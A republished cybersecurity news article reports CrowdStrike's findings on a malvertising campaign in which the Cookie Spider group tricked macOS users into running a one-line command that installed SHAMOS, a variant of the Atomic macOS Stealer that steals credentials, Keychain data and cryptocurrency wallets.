KP Cybersecurity news

Hundreds Targeted in New Atomic macOS Stealer Campaign

Fri, 08/22/2025 - 11:40 / 0 Comments

CrowdStrike warns of a spike in attacks aimed at infecting macOS users with a variant of the infamous Atomic macOS Stealer (AMOS) information stealer.

Between June and August, the cybercrime group Cookie Spider, which operates the AMOS malware-as-a-service (MaaS) enterprise, used malvertising to direct victims to fraudulent help websites and trick them into installing the malware.

The campaign, CrowdStrike says, targeted users who were searching for solutions to common macOS issues, and relied on promoting fraudulent advertisements for websites where victims were instructed to execute a malicious command on their systems.

The command would fetch a Bash script from a remote server, to capture the victim’s password and download an executable from another remote location.

Dubbed SHAMOS, the payload is a variant of AMOS that contains anti-VM checks to prevent execution in a sandboxed environment, and which can perform reconnaissance and data collection tasks.

The malware searches the system for files that contain credentials, data from Keychain, AppleNotes, browsers, and known cryptocurrency wallets, and attempts to exfiltrate them to a remote server, packed in a ZIP archive.

Additionally, SHAMOS can download and execute payloads, including a botnet module and a fake Ledger Live wallet application.

The malvertising campaign targeted users in Canada, China, Colombia, Italy, Japan, Mexico, the US, the UK, and other countries, but was not served to Russian users.

CrowdStrike’s investigation revealed that the cybercriminals likely impersonated a legitimate Australia-based electronics store in their Google Advertising profile.

“This campaign underscores the popularity of malicious one-line installation commands among eCrime actors. This technique allows them to bypass Gatekeeper security checks and install the Mach-O executable directly onto victim devices,” CrowdStrike notes.

This article was originally published by Security Week. Please check their website for the original content.

Add new comment

About text formats

Plain text

  • No HTML tags allowed.
  • Lines and paragraphs break automatically.
  • Web page addresses and email addresses turn into links automatically.
CAPTCHA This question is for testing whether or not you are a human visitor and to prevent automated spam submissions.
8 + 0 =
Solve this simple math problem and enter the result. E.g. for 1+3, enter 4.

Share The Story


Stay informed - subscribe to our newsletter.
The subscriber's email address.

Recent Posts